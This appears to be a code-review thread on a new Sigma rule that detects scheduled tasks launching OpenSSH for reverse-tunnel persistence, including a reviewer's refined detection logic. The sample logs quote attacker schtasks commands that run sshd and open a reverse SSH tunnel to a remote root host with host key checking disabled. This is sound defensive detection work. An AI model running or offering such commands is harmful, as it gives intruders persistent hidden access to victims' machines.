rules/windows/process_creation/proc_creation_win_schtasks_openssh_tunnelling.yml

```
@@ -0,0 +1,31 @@
+title: Potential SSH Tunnel Persistence Install Using A Scheduled Task
+id: 2daa93a0-a5fb-41c5-8cd8-3c11294bfd1f
+status: experimental
+description: Detects the creation of new scheduled tasks via commandline, using Schtasks.exe. This rule detects tasks creating that call OpenSSH, which may indicate the creation of Reverse SSH Tunnel to an attackers server.
+references:
+    - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
+    - https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection
+author: Rory Duncan
+date: 2024-12-30
+tags:
+    - attack.persistence
+    - attack.execution
+    - attack.t1053.005
+    - attack.command-and-control
+logsource:
+    product: windows
+    category: process_creation
+detection:
+    selection_img:
+        - Image|endswith: '\schtasks.exe'
+        - OriginalFileName: 'schtasks.exe'
+    selection_create:
+        CommandLine|contains: ' /create '
+    selection_command:
+        CommandLine|contains:
+            - 'ssh.exe'
+            - 'sshd.exe'
+    condition: all of selection_*
```

```suggestion
detection:
    selection_img:
        - Image|endswith: '\schtasks.exe'
        - OriginalFileName: 'schtasks.exe'
    selection_cli_sshd:
        CommandLine|contains|all:
            - ' /create '
            - 'sshd.exe'
            - '-f'
    selection_cli_ssh:
        CommandLine|contains|all:
            - ' /create '
            - 'ssh.exe'
            - '-i'
    condition: selection_img and 1 of selection_cli_*
```

to be more precise as the rule is high
The logs
```
schtasks.exe /create /sc minute /mo 1 /tn "SSH Server" /rl highest /np /tr "%programdata%\sshd\sshd.exe -f %programdata%\sshd\config\sshd_config"
schtasks.exe /create /sc minute /mo 1 /tn "SSH Key Exchange" /rl highest /np /tr "%programdata%\sshd\ssh.exe -i %programdata%\sshd\config\keys\id_rsa -N -R 22682:127.0.0.1:2222 -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 root@
```